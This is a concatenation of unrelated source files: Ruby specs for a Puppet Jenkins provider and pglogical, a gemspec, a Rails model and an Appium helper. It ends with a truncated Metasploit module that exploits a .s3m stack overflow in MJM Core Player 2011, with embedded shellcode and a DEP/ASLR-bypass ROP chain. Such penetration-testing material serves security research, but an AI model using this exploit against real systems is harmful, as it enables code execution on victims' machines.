it 'uses fact values' do
expect(described_class).to receive(:cli).with(
['groovy', 'fact.groovy', 'foo'], {}, []
)
described_class.clihelper('foo')
end
end # uses fact values
shared_examples 'uses catalog values' do
it 'uses catalog values' do
expect(described_class).to receive(:cli).with(
['groovy', 'cat.groovy', 'foo'],
{ catalog: catalog },
[]
)
described_class.clihelper('foo', catalog: catalog)
end
end # uses catalog values
it 'is a class method' do
expect(described_class).to respond_to(:clihelper)
end
it 'wraps ::cli class method' do
expect(described_class).to receive(:cli)
described_class.clihelper('foo')
end
context 'no catalog' do
context 'no facts' do
include_examples 'uses default values'
end # no facts
context 'with facts' do
include_context 'facts'
include_examples 'uses fact values'
end # with facts
end # no catalog
context 'with catalog' do
let(:catalog) { Puppet::Resource::Catalog.new }
context 'no jenkins::cli::config class' do
context 'no facts' do
include_examples 'uses default values'
end # no facts
context 'with facts' do
include_context 'facts'
include_examples 'uses fact values'
end # with facts
end # no jenkins::cli::config class
context 'with jenkins::cli::config class' do
before do
jenkins = Puppet::Type.type(:component).new(
name: 'jenkins::cli::config',
puppet_helper: 'cat.groovy'
)
catalog.add_resource jenkins
end
context 'no facts' do
include_examples 'uses catalog values'
end # no facts
context 'with facts' do
include_context 'facts'
include_examples 'uses catalog values'
end # with facts
end # with jenkins::cli::config class
end # with catalog
end # ::clihelper
describe '::cli' do
before do
# disable with_retries sleeping to [vastly] speed up testing
#
# we are relying the side effects of ::suitable? from a previous example
Retries.sleep_enabled = false
end
shared_examples 'uses default values' do
it 'uses default values' do
expect(described_class.superclass).to receive(:execute).with(
'java -jar /usr/lib/jenkins/jenkins-cli.jar -s http://localhost:8080 foo',
failonfail: true, combine: true
)
described_class.cli('foo')
end
end # uses default values
shared_examples 'uses fact values' do
it 'uses fact values' do
expect(described_class.superclass).to receive(:execute).with(
'java -jar fact.jar -s http://localhost:11 foo',
failonfail: true, combine: true
)
described_class.cli('foo')
end
end # uses fact values
shared_examples 'uses catalog values' do
it 'uses catalog values' do
expect(described_class.superclass).to receive(:execute).with(
'java -jar cat.jar -s http://localhost:111 foo',
failonfail: true, combine: true
)
described_class.cli('foo', catalog: catalog)
end
end # uses catalog values
it 'is a class method' do
expect(described_class).to respond_to(:cli)
end
it 'wraps the superclasses ::execute method' do
expect(described_class.superclass).to receive(:execute)
described_class.cli('foo')
end
context 'no catalog' do
context 'no facts' do
include_examples 'uses default values'
end # no facts
context 'with facts' do
include_context 'facts'
include_examples 'uses fact values'
end # with facts
end # no catalog
context 'with catalog' do
let(:catalog) { Puppet::Resource::Catalog.new }
context 'no jenkins::cli::config class' do
context 'no facts' do
include_examples 'uses default values'
end # no facts
context 'with facts' do
include_context 'facts'
include_examples 'uses fact values'
end # with facts
end # no jenkins::cli::config class
context 'with jenkins::cli::config class' do
before do
jenkins = Puppet::Type.type(:component).new(
name: 'jenkins::cli::config',
cli_jar: 'cat.jar',
url: 'http://localhost:111',
ssh_private_key: 'cat.id_rsa',
cli_tries: 222,
cli_try_sleep: 333
)
catalog.add_resource jenkins
end
context 'no facts' do
include_examples 'uses catalog values'
end # no facts
context 'with facts' do
include_context 'facts'
include_examples 'uses catalog values'
end # with facts
end # with jenkins::cli::config class
end # with catalog
context 'auth failure' do
context 'without ssh_private_key' do
CLI_AUTH_ERRORS.each do |error|
it 'does not retry cli on AuthError exception' do
expect(described_class.superclass).to receive(:execute).with(
'java -jar /usr/lib/jenkins/jenkins-cli.jar -s http://localhost:8080 foo',
failonfail: true, combine: true
).and_raise(AuthError, error)
expect { described_class.cli('foo') }.
to raise_error(AuthError)
end
end
end
# without ssh_private_key
context 'with ssh_private_key' do
let(:catalog) { Puppet::Resource::Catalog.new }
before do
jenkins = Puppet::Type.type(:component).new(
name: 'jenkins::cli::config',
ssh_private_key: 'cat.id_rsa'
)
catalog.add_resource jenkins
end
it 'tries cli without auth first' do
expect(described_class.superclass).to receive(:execute).with(
'java -jar /usr/lib/jenkins/jenkins-cli.jar -s http://localhost:8080 foo',
failonfail: true, combine: true
)
described_class.cli('foo', catalog: catalog)
end
CLI_AUTH_ERRORS.each do |error|
it 'retries cli on AuthError exception' do
expect(described_class.superclass).to receive(:execute).with(
'java -jar /usr/lib/jenkins/jenkins-cli.jar -s http://localhost:8080 foo',
failonfail: true, combine: true
).and_raise(AuthError, error)
expect(described_class.superclass).to receive(:execute).with(
'java -jar /usr/lib/jenkins/jenkins-cli.jar -s http://localhost:8080 -i cat.id_rsa foo',
failonfail: true, combine: true
)
described_class.cli('foo', catalog: catalog)
# and it should remember that auth is required
expect(described_class.superclass).not_to receive(:execute).with(
'java -jar /usr/lib/jenkins/jenkins-cli.jar -s http://localhost:8080 foo',
failonfail: true, combine: true
)
expect(described_class.superclass).to receive(:execute).with(
'java -jar /usr/lib/jenkins/jenkins-cli.jar -s http://localhost:8080 -i cat.id_rsa foo',
failonfail: true, combine: true
)
described_class.cli('foo', catalog: catalog)
end
end
end # with ssh_private_key
end # auth failure
context 'network failure' do
context 'without ssh_private_key' do
CLI_NET_ERRORS.each do |error|
it 'does not retry cli on AuthError exception' do
expect(described_class.superclass).to receive(:execute).with(
'java -jar /usr/lib/jenkins/jenkins-cli.jar -s http://localhost:8080 foo',
failonfail: true, combine: true
).exactly(30).times.and_raise(NetError, error)
expect { described_class.cli('foo') }.
to raise_error(NetError)
end
end
end
# without ssh_private_key
end # network failure
context 'when UnknownError exception' do
let(:catalog) { Puppet::Resource::Catalog.new }
context 'retry n times' do
it 'by default' do
jenkins = Puppet::Type.type(:component).new(
name: 'jenkins::cli::config'
)
catalog.add_resource jenkins
expect(described_class.superclass).to receive(:execute).with(
'java -jar /usr/lib/jenkins/jenkins-cli.jar -s http://localhost:8080 foo',
failonfail: true, combine: true
).exactly(30).times.and_raise(UnknownError, 'foo')
expect { described_class.cli('foo', catalog: catalog) }.
to raise_error(UnknownError, 'foo')
end
it 'from catalog value' do
jenkins = Puppet::Type.type(:component).new(
name: 'jenkins::cli::config',
cli_tries: 2
)
catalog.add_resource jenkins
expect(described_class.superclass).to receive(:execute).with(
'java -jar /usr/lib/jenkins/jenkins-cli.jar -s http://localhost:8080 foo',
failonfail: true, combine: true
).exactly(2).times.and_raise(UnknownError, 'foo')
expect { described_class.cli('foo', catalog: catalog) }.
to raise_error(UnknownError, 'foo')
end
it 'from fact' do
Facter.add(:jenkins_cli_tries) { setcode { 3 } }
jenkins = Puppet::Type.type(:component).new(
name: 'jenkins::cli::config'
)
catalog.add_resource jenkins
expect(described_class.superclass).to receive(:execute).with(
'java -jar /usr/lib/jenkins/jenkins-cli.jar -s http://localhost:8080 foo',
failonfail: true, combine: true
).exactly(3).times.and_raise(UnknownError, 'foo')
expect { described_class.cli('foo', catalog: catalog) }.
to raise_error(UnknownError, 'foo')
end
it 'from catalog overriding fact' do
Facter.add(:jenkins_cli_tries) { setcode { 3 } }
jenkins = Puppet::Type.type(:component).new(
name: 'jenkins::cli::config',
cli_tries: 2
)
catalog.add_resource jenkins
expect(described_class.superclass).to receive(:execute).with(
'java -jar /usr/lib/jenkins/jenkins-cli.jar -s http://localhost:8080 foo',
failonfail: true, combine: true
).exactly(2).times.and_raise(UnknownError, 'foo')
expect { described_class.cli('foo', catalog: catalog) }.
to raise_error(UnknownError, 'foo')
end
end # n times
context 'waiting up to n seconds' do
# this isn't behavioral testing because we don't want to either wait
# for the wallclock delay timeout or attempt to accurate time examples
it 'by default' do
jenkins = Puppet::Type.type(:component).new(
name: 'jenkins::cli::config'
)
catalog.add_resource jenkins
expect(described_class).to receive(:with_retries).with(hash_including(max_sleep_seconds: 2))
described_class.cli('foo', catalog: catalog)
end
it 'from catalog value' do
jenkins = Puppet::Type.type(:component).new(
name: 'jenkins::cli::config',
cli_try_sleep: 3
)
catalog.add_resource jenkins
expect(described_class).to receive(:with_retries).with(hash_including(max_sleep_seconds: 3))
described_class.cli('foo', catalog: catalog)
end
it 'from fact' do
Facter.add(:jenkins_cli_try_sleep) { setcode { 4 } }
jenkins = Puppet::Type.type(:component).new(
name: 'jenkins::cli::config'
)
catalog.add_resource jenkins
expect(described_class).to receive(:with_retries).with(hash_including(max_sleep_seconds: 4))
described_class.cli('foo', catalog: catalog)
end
it 'from catalog overriding fact' do
Facter.add(:jenkins_cli_try_sleep) { setcode { 4 } }
jenkins = Puppet::Type.type(:component).new(
name: 'jenkins::cli::config',
cli_try_sleep: 3
)
catalog.add_resource jenkins
expect(described_class).to receive(:with_retries).with(hash_including(max_sleep_seconds: 3))
described_class.cli('foo', catalog: catalog)
end
end
end # should retry cli on UnknownError
context 'options with :stdinjson' do
RSpec::Matchers.define :a_json_doc do |x|
match { |actual| JSON.parse(actual) == x }
end
let(:realm_oauth_json) do
<<-EOS
{
"setSecurityRealm": {
"org.jenkinsci.plugins.GithubSecurityRealm": [
"https://github.com",
"https://api.github.com",
"42",
"43",
"read:org"
]
}
}
EOS
end
let(:realm_oauth) { JSON.parse(realm_oauth_json) }
it 'generates a temp file with json output' do
tmp = instance_double('Template')
expect(Tempfile).to receive(:open) { tmp }
expect(tmp).to receive(:write).with(a_json_doc(realm_oauth))
expect(tmp).to receive(:flush)
expect(tmp).to receive(:close)
expect(tmp).to receive(:unlink)
expect(tmp).to receive(:path) { '/dne.tmp' }
expect(described_class.superclass).to receive(:execute).with(
'java -jar /usr/lib/jenkins/jenkins-cli.jar -s http://localhost:8080 foo',
failonfail: true,
combine: true,
stdinfile: '/dne.tmp'
)
described_class.cli('foo', stdinjson: realm_oauth)
end
end # options with :stdinjson
context 'options with :stdin' do
it 'generates a temp file with stdin string' do
tmp = instance_double('Template')
expect(Tempfile).to receive(:open) { tmp }
expect(tmp).to receive(:write).with('bar')
expect(tmp).to receive(:flush)
expect(tmp).to receive(:close)
expect(tmp).to receive(:unlink)
expect(tmp).to receive(:path) { '/dne.tmp' }
expect(described_class.superclass).to receive(:execute).with(
'java -jar /usr/lib/jenkins/jenkins-cli.jar -s http://localhost:8080 foo',
failonfail: true,
combine: true,
stdinfile: '/dne.tmp'
)
described_class.cli('foo', stdin: 'bar')
end
end # options with :stdin
end # ::cli
end
| 31.119186 | 102 | 0.61163 |
219035edf8fc4464dce9769292fd2c7030478d9d | 1,151 | # coding: utf-8
lib = File.expand_path('../lib', __FILE__)
$LOAD_PATH.unshift(lib) unless $LOAD_PATH.include?(lib)
require 'redtube_api/version'
# Gem packaging metadata for the redtube_api gem.
Gem::Specification.new do |spec|
  spec.name          = "redtube_api"
  spec.version       = RedtubeApi::VERSION
  spec.authors       = ["Kevin Kirsche"]
  spec.email         = ["[email protected]"]
  # Typo fix: "Unoffical" -> "Unofficial" (the description below already
  # used the correct spelling).
  spec.summary       = %q{Unofficial API wrapper for the RedTube developer API.}
  spec.description   = %q{Unofficial API wrapper for the RedTube developer API giving you the ability to easily work with all of the features within this adult website.}
  spec.homepage      = "https://github.com/kkirsche/redtube_api/"
  spec.license       = "MIT"

  # Package every git-tracked file except tests/specs/features.
  spec.files         = `git ls-files -z`.split("\x0").reject { |f| f.match(%r{^(test|spec|features)/}) }
  spec.bindir        = "exe"
  spec.executables   = spec.files.grep(%r{^exe/}) { |f| File.basename(f) }
  spec.require_paths = ["lib"]

  spec.add_development_dependency "bundler", "~> 1.9"
  spec.add_development_dependency "rake", "~> 10.0"
  spec.add_development_dependency "minitest", "~> 5.6"

  # Hurley is the HTTP client used at runtime.
  spec.add_runtime_dependency "hurley", "~> 0.1"
end
| 42.62963 | 169 | 0.667246 |
912c8173e44f1e358e20b05c8708b73e07b2a86e | 462 | # == Schema Information
#
# Table name: review_replies
#
# id :integer not null, primary key
# review_id :integer
# msg :text default("")
# created_at :datetime not null
# updated_at :datetime not null
#
# Indexes
#
# index_review_replies_on_review_id (review_id)
#
# A reply posted in response to a Review (see schema annotation above).
class ReviewReply < ApplicationRecord
  belongs_to :review

  # Both the parent review reference and the reply body are mandatory.
  validates :review_id, :msg, presence: true
end
| 22 | 53 | 0.651515 |
4a5ade4ccdf792801afd673a9c21bba486b88e81 | 6,485 | require 'selenium/webdriver/common/error'
# Generic helper methods not specific
# to a particular tag name
module Appium
  # Generic, tag-agnostic helpers intended to be mixed into the Appium
  # driver object. Methods here reference `@driver`, `find_element`,
  # `find_elements`, `get_source` and `app_strings`, which the including
  # object is expected to provide.
  module Common
    # json and ap are required for the source method.
    require 'json'
    require 'ap' # awesome print
    require 'timeout' # for wait
    # iOS .name returns the accessibility attribute if it's set. if not set, the string value is used.
    # Android .name returns the accessibility attribute and nothing if it's not set.
    #
    # .text should be cross platform so prefer that over name, unless both
    # Android and iOS have proper accessibility attributes.
    # .text and .value should be the same so use .text over .value.
    #
    # secure class_name is iOS only because it can't be implemented using uiautomator for Android.
    #
    # find_element :text doesn't work so use XPath to find by text.
    # Return block.call and ignore any exceptions.
    # NOTE: deliberately rescues even Exception subclasses (see rubocop
    # disable) — callers use this for best-effort operations.
    def ignore(&block)
      block.call
    rescue Exception # rubocop:disable Lint/HandleExceptions, Lint/RescueException
    end
    # Navigate back.
    # @return [void]
    def back
      @driver.navigate.back
    end
    # For Sauce Labs reporting. Returns the current session id.
    def session_id
      @driver.session_id
    end
    # Returns the first element that matches the provided xpath.
    #
    # @param xpath_str [String] the XPath string
    # @return [Element]
    def xpath(xpath_str)
      find_element :xpath, xpath_str
    end
    # Returns all elements that match the provided xpath.
    #
    # @param xpath_str [String] the XPath string
    # @return [Array<Element>]
    def xpaths(xpath_str)
      find_elements :xpath, xpath_str
    end
    # Pretty-prints XML/HTML page source with two-space indentation.
    # HTML is detected by a leading '<html'; network access is disabled
    # during parsing (NONET).
    def _print_source(source)
      opts = Nokogiri::XML::ParseOptions::NOBLANKS | Nokogiri::XML::ParseOptions::NONET
      if source.start_with? '<html'
        doc = Nokogiri::HTML(source) { |cfg| cfg.options = opts }
      else
        doc = Nokogiri::XML(source) { |cfg| cfg.options = opts }
      end
      puts doc.to_xml indent: 2
    end
    # @private
    # SAX document that tallies element occurrences by tag name.
    # http://nokogiri.org/Nokogiri/XML/SAX.html
    class CountElements < Nokogiri::XML::SAX::Document
      attr_reader :result
      def initialize
        reset
      end
      def reset
        @result = Hash.new 0
      end
      # http://nokogiri.org/Nokogiri/XML/SAX/Document.html
      def start_element(name, attrs = [])
        # Count only visible elements. Android is always visible
        # NOTE(review): @driver is never assigned inside this SAX document,
        # so this call would hit nil — presumably the driver instance was
        # meant to be injected (or a global used); verify before relying on
        # get_page_class.
        element_visible = @driver.device_is_android? ? true : Hash[attrs]['visible'] == 'true'
        @result[name] += 1 if element_visible
      end
      # Formats the tally as "COUNTx tag" lines, most frequent first.
      def formatted_result
        message = ''
        sorted = @result.sort_by { |_element, count| count }.reverse
        sorted.each do |element, count|
          message += "#{count}x #{element}\n"
        end
        message.strip
      end
    end # class CountElements
    # Returns a string of class counts of visible elements.
    # The SAX parser is memoized; its document is reset before each parse.
    def get_page_class
      parser = @count_elements_parser ||= Nokogiri::XML::SAX::Parser.new(CountElements.new)
      parser.document.reset
      parser.parse get_source
      parser.document.formatted_result
    end
    # Count all classes on screen and print to stdout.
    # Useful for appium_console.
    def page_class
      puts get_page_class
      nil
    end
    # Converts pixel values to window relative values
    #
    # ```ruby
    # px_to_window_rel x: 50, y: 150
    # ```
    # Returns an OpenStruct whose x/y are "px / window-dimension" strings.
    def px_to_window_rel(opts = {})
      w = @driver.window_size
      x = opts.fetch :x, 0
      y = opts.fetch :y, 0
      OpenStruct.new(x: "#{x.to_f} / #{w.width.to_f}",
                     y: "#{y.to_f} / #{w.height.to_f}")
    end
    # @private
    # Memoizes app_strings; falls back to {} when the call errors.
    def lazy_load_strings
      # app strings only works on local apps.
      # on disk apps (ex: com.android.settings) will error
      @strings_xml ||= ignore { app_strings } || {}
    end
    # Search strings.xml's values for target.
    # @param target [String] the target to search for in strings.xml values
    # @return [Array]
    def xml_keys(target)
      lazy_load_strings
      @strings_xml.select { |key, _value| key.downcase.include? target.downcase }
    end
    # Search strings.xml's keys for target.
    # @param target [String] the target to search for in strings.xml keys
    # @return [Array]
    def xml_values(target)
      lazy_load_strings
      @strings_xml.select { |_key, value| value.downcase.include? target.downcase }
    end
    # Resolve id in strings.xml and return the value.
    # @param id [String] the id to resolve
    # @return [String]
    def resolve_id(id)
      lazy_load_strings
      @strings_xml[id]
    end
    # SAX document that collects elements (optionally filtered by tag name)
    # in document order along with their attributes and text.
    class HTMLElements < Nokogiri::XML::SAX::Document
      attr_reader :filter
      # convert to string to support symbols
      def filter=(value)
        # nil and false disable the filter
        return @filter = false unless value
        @filter = value.to_s.downcase
      end
      def initialize
        reset
        @filter = false
      end
      def reset
        @element_stack = []
        @elements_in_order = []
        @skip_element = false
      end
      # Renders the collected elements as "name" blocks with one
      # "  attr: value" line per attribute; elements without attributes
      # are omitted from the output.
      def result
        @elements_in_order.reduce('') do |r, e|
          name = e.delete :name
          attr_string = e.reduce('') do |string, attr|
            attr_1 = attr[1]
            attr_1 = attr_1 ? attr_1.strip : attr_1
            string + " #{attr[0]}: #{attr_1}\n"
          end
          unless attr_string.nil? || attr_string.empty?
            r += "\n#{name}\n#{attr_string}"
          end
          r
        end
      end
      def start_element(name, attrs = [])
        @skip_element = filter && !filter.include?(name.downcase)
        return if @skip_element
        element = { name: name }
        attrs.each { |a| element[a[0]] = a[1] }
        @element_stack.push element
        @elements_in_order.push element
      end
      def end_element(name)
        return if filter && !filter.include?(name.downcase)
        # rindex: pop the most recently opened element with this name
        element_index = @element_stack.rindex { |e| e[:name] == name }
        @element_stack.delete_at element_index
      end
      def characters(chars)
        return if @skip_element
        element = @element_stack.last
        element[:text] = chars
      end
    end
    # Raises Selenium's standard "element not found" error.
    def _no_such_element
      fail Selenium::WebDriver::Error::NoSuchElementError,
           'An element could not be located on the page using the given search parameters.'
    end
  end # module Common
end # module Appium
| 29.080717 | 102 | 0.620971 |
7947f13f3e329ab6b955056d93db5d8ca7c90218 | 8,224 | describe "ar_pglogical extension" do
let(:connection) { ActiveRecord::Base.connection }
around do |example|
pool = ActiveRecord::Base.establish_connection(
:adapter => "postgresql",
:database => "pg_pglogical_test",
:pool => 1
)
pool.connection.transaction do
begin
example.call
ensure
raise ActiveRecord::Rollback
end
end
ActiveRecord::Base.remove_connection
end
describe "#enable" do
it "enables the pglogical extension" do
connection.pglogical.enable
expect(connection.extensions).to include("pglogical")
end
end
describe "#enabled?" do
it "detects that the extensions are not enabled" do
expect(connection.pglogical.enabled?).to be false
end
end
context "with the extensions enabled" do
let(:node_name) { "test-node" }
let(:node_dsn) { "host=host.example.com dbname=vmdb_test" }
before do
connection.pglogical.enable
end
describe "#enabled?" do
it "detects that the extensions are enabled" do
expect(connection.pglogical.enabled?).to be true
end
end
describe "#disable" do
it "disables the pglogical extension" do
connection.pglogical.disable
expect(connection.extensions).not_to include("pglogical")
end
end
describe "#node_create" do
it "creates a node" do
connection.pglogical.node_create(node_name, node_dsn)
res = connection.exec_query(<<-SQL).first
SELECT node_name, if_dsn
FROM pglogical.node JOIN pglogical.node_interface
ON node_id = if_nodeid
LIMIT 1
SQL
expect(res["node_name"]).to eq(node_name)
expect(res["if_dsn"]).to eq(node_dsn)
end
end
context "with a node" do
before do
connection.pglogical.node_create(node_name, node_dsn)
end
describe "#nodes" do
it "lists the node's names and connection strings" do
expected = {
"name" => node_name,
"conn_string" => node_dsn
}
expect(connection.pglogical.nodes.first).to eq(expected)
end
end
describe "#node_drop" do
it "removes a node" do
connection.pglogical.node_drop(node_name)
res = connection.exec_query(<<-SQL)
SELECT node_name
FROM pglogical.node
SQL
expect(res.rows.flatten).not_to include(node_name)
end
end
describe "#node_dsn_update" do
let(:new_dsn) { "host='newhost.example.com' dbname='vmdb_test' user='root'" }
it "sets the dsn" do
expect(connection.pglogical.node_dsn_update(node_name, new_dsn)).to be true
dsn = connection.exec_query(<<-SQL).first["if_dsn"]
SELECT if_dsn
FROM pglogical.node_interface if
JOIN pglogical.node node ON
if.if_nodeid = node.node_id
WHERE node.node_name = '#{node_name}'
SQL
expect(dsn).to eq(new_dsn)
end
end
describe "#replication_set_create" do
it "creates a replication set" do
rep_insert = true
rep_update = true
rep_delete = true
rep_trunc = false
connection.pglogical.replication_set_create("test-set", rep_insert,
rep_update, rep_delete, rep_trunc)
res = connection.exec_query(<<-SQL)
SELECT *
FROM pglogical.replication_set
WHERE set_name = 'test-set'
SQL
expect(res.count).to eq(1)
row = res.first
expect(row["replicate_insert"]).to be true
expect(row["replicate_update"]).to be true
expect(row["replicate_delete"]).to be true
expect(row["replicate_truncate"]).to be false
end
end
context "with a replication set" do
let(:set_name) { "test-set" }
before do
connection.pglogical.replication_set_create(set_name)
end
describe "#replication_sets" do
it "lists the set names" do
expected = ["default", "default_insert_only", "ddl_sql", set_name]
expect(connection.pglogical.replication_sets).to match_array(expected)
end
end
describe "#replication_set_alter" do
it "alters the replication set" do
connection.pglogical.replication_set_alter(set_name, true, true,
false, false)
row = connection.exec_query(<<-SQL).first
SELECT *
FROM pglogical.replication_set
WHERE set_name = '#{set_name}'
SQL
expect(row["replicate_insert"]).to be true
expect(row["replicate_update"]).to be true
expect(row["replicate_delete"]).to be false
expect(row["replicate_truncate"]).to be false
end
end
describe "#replication_set_drop" do
it "removes a replication set" do
connection.pglogical.replication_set_drop(set_name)
res = connection.exec_query(<<-SQL)
SELECT *
FROM pglogical.replication_set
WHERE set_name = '#{set_name}'
SQL
expect(res.count).to eq(0)
end
end
describe "#replication_set_*_table" do
it "adds and removes a table to/from the set" do
# create a test table
connection.exec_query(<<-SQL)
CREATE TABLE test (id INTEGER PRIMARY KEY)
SQL
connection.pglogical.replication_set_add_table(set_name, "test")
res = connection.exec_query(<<-SQL)
SELECT *
FROM pglogical.tables
WHERE relname = 'test'
SQL
expect(res.first["set_name"]).to eq(set_name)
connection.pglogical.replication_set_remove_table(set_name, "test")
res = connection.exec_query(<<-SQL)
SELECT *
FROM pglogical.tables
WHERE relname = 'test'
SQL
expect(res.first["set_name"]).to be nil
end
end
describe "#replication_set_add_all_tables" do
it "adds all the tables in a schema" do
schema_name = "test_schema"
connection.exec_query("CREATE SCHEMA #{schema_name}")
connection.exec_query(<<-SQL)
CREATE TABLE #{schema_name}.test1 (id INTEGER PRIMARY KEY)
SQL
connection.exec_query(<<-SQL)
CREATE TABLE #{schema_name}.test2 (id INTEGER PRIMARY KEY)
SQL
connection.pglogical.replication_set_add_all_tables(set_name, [schema_name])
set_tables = connection.exec_query(<<-SQL).rows.flatten
SELECT relname
FROM pglogical.tables
WHERE set_name = '#{set_name}'
SQL
expect(set_tables).to include("test1")
expect(set_tables).to include("test2")
end
end
describe "#tables_in_replication_set" do
it "lists the tables in the set" do
# create a test table
connection.exec_query(<<-SQL)
CREATE TABLE test (id INTEGER PRIMARY KEY)
SQL
connection.pglogical.replication_set_add_table(set_name, "test")
expect(connection.pglogical.tables_in_replication_set(set_name)).to eq(["test"])
end
end
describe "#with_replication_set_lock" do
it "takes a lock on the replication set table" do
connection.pglogical.with_replication_set_lock(set_name) do
result = connection.exec_query(<<-SQL)
SELECT 1
FROM pg_locks JOIN pg_class
ON pg_locks.relation = pg_class.oid
WHERE
pg_class.relname = 'replication_set' AND
pg_locks.mode = 'RowShareLock'
SQL
expect(result.count).to eq(1)
end
end
end
end
end
end
end
| 31.509579 | 92 | 0.578064 |
08d32e4615103d2655b0c7e2267f9cbe16e1a45d | 5,948 | ##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
# File-format exploit for MJM Core Player 2011 (.s3m stack buffer overflow)
# with a DEP/ASLR-bypassing ROP chain. See CORELAN-11-004 in References.
class MetasploitModule < Msf::Exploit::Remote
  Rank = GoodRanking

  include Msf::Exploit::FILEFORMAT

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'MJM Core Player 2011 .s3m Stack Buffer Overflow',
      'Description'    => %q{
          This module exploits a stack buffer overflow in MJM Core Player 2011
        When opening a malicious s3m file in this applications, a stack buffer overflow can be
        triggered, resulting in arbitrary code execution.
        This exploit bypasses DEP & ASLR, and works on XP, Vista & Windows 7.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'rick2600', #found the vulnerabilities
          'corelanc0d3r <peter.ve[at]corelan.be>', #rop exploit + msf module
        ],
      'References'     =>
        [
          [ 'OSVDB', '72101'],
          [ 'URL', 'http://www.corelan.be/advisories.php?id=CORELAN-11-004' ],
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'process',
        },
      'Payload'        =>
        {
          'Space' => 2339, #about 0x900 bytes
          'DisableNops' => 'True',
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          [ 'Windows Universal Generic DEP & ASLR Bypass',
            {
              'OffSet' => 819, #core player.exe
              'Ret' => 0x1000156f, #core player.exe
            }
          ],
        ],
      'Privileged'     => false,
      'DisclosureDate' => 'Apr 30 2011',
      'DefaultTarget'  => 0))
    register_options(
      [
        OptString.new('FILENAME', [ true, 's3m file', 'song.s3m']),
      ], self.class)
  end

  # Random 32-bit integer used as filler between ROP gadgets.
  def junk
    return rand_text(4).unpack("L")[0].to_i
  end

  # Builds the malicious .s3m file:
  #   [static S3M header] [junk up to OffSet] [pivot] [ROP chain] [NOP sled]
  #   [encoded payload] [static footer]
  def exploit
    print_status("Creating '#{datastore['FILENAME']}' file ...")
    # Static S3M file header (the 'SCRM' signature bytes \x53\x43\x52\x4d
    # are visible in the third line).
    header = "\x42\x42\x42\x42\x42\x42\x42\x42\x41\x41\x41\x41\x41\x41\x41\x41"
    header << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x1a\x10\x00\x00"
    header << "\x24\x00\x00\x01\x00\x0d\x08\x00\x20\x13\x02\x00\x53\x43\x52\x4d"
    header << "\x40\x06\x94\xb0\x10\xfc\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
    header << "\x00\x08\x01\x09\x02\x0a\x03\x0b\x04\x0c\xff\xff\xff\xff\xff\xff"
    header << "\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
    header << "\x06\x00\x03\x01\x02\x04\x05\x07\x08\x09\x09\x0a\x0b\x0c\x0d\x0e"
    header << "\x0f\x10\x10\x11\x12\x13\x14\x15\x16\x16\x17\x18\x19\x18\x1a\x1b"
    header << "\x1b\x1c\xff\xff\x13\x00\x18\x00\x1d\x00\x22\x00\x27\x00\x2c\x00"
    header << "\x31\x00\x36\x00\x3b\x00\x40\x00\x45\x00\x4a\x00\x4f\x00\x54\x00"
    header << "\x59\x00\x5e\x00\x63\x00\x68\x00\x6d\x00\x72\x00\x77\x00\x7c\x00"
    header << "\x81\x00\x86\x00\x8b\x00\x90\x00\x95\x00\x9a\x00\x9f\x00\xa4\x00"
    header << "\xa9\x00\xae\x00\xb3\x00\xb8\x00\xbd\x00\xc2\x00\xc7\x00\xcc\x00"
    header << "\xd1\x00\xd6\x00\xdb\x00\xe0\x00\x14\x01\x4d\x01\x87\x01\xc0\x01"
    header << "\x0e\x02\x5a\x02\x9a\x02\xe9\x02\x40\x03\x7f\x03\xc0\x03\x01\x04"
    header << "\x28\x04\x52\x04\x86\x04\xb9\x04\xea\x04\x1a\x05\x41\x05\x6e\x05"
    header << "\x96\x05\xbc\x05\xeb\x05\x25\x06\x78\x06\xcc\x06\x21\x07\x72\x07"
    header << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
    header << "\x01"
    # NOTE(review): static shellcode blob appended after the payload; the
    # trailing bytes contain the ASCII string 'calc' (\x63\x61\x6c\x63) —
    # presumably a hard-coded calc.exe test payload; verify before reuse.
    footer = "\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52"
    footer << "\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26"
    footer << "\x31\xff\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d"
    footer << "\x01\xc7\xe2\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0"
    footer << "\x8b\x40\x78\x85\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b"
    footer << "\x58\x20\x01\xd3\xe3\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff"
    footer << "\x31\xc0\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf4\x03\x7d"
    footer << "\xf8\x3b\x7d\x24\x75\xe2\x58\x8b\x58\x24\x01\xd3\x66\x8b"
    footer << "\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44"
    footer << "\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x58\x5f\x5a\x8b"
    footer << "\x12\xeb\x86\x5d\x6a\x01\x8d\x85\xb9\x00\x00\x00\x50\x68"
    footer << "\x31\x8b\x6f\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x68\xa6\x95"
    footer << "\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb"
    footer << "\x47\x13\x72\x6f\x6a\x00\x53\xff\xd5\x63\x61\x6c\x63\x00"
    footer << "\x00\x00\x00\x00\x00\x00\x00\x00"
    print_status("Preparing payload")
    # stack pivot: address taken from the target definition above
    pivot = [target.ret].pack('V')
    # ROP chain; `junk` entries are random filler popped by the gadgets
    rop_gadgets =
      [
        # pvefindaddr rop 'n roll
        0x004c0021, # POP ECX # RETN
        0x00000000,
        0x0042850e, # PUSH ESP # ADD EDI,EDI # POP EDI # POP ESI # POP EBX # POP EBP # RETN 0C
        junk,
        junk,
        junk,
        0x00461248, # MOV EAX,EDI # POP EDI # POP ESI # RETN
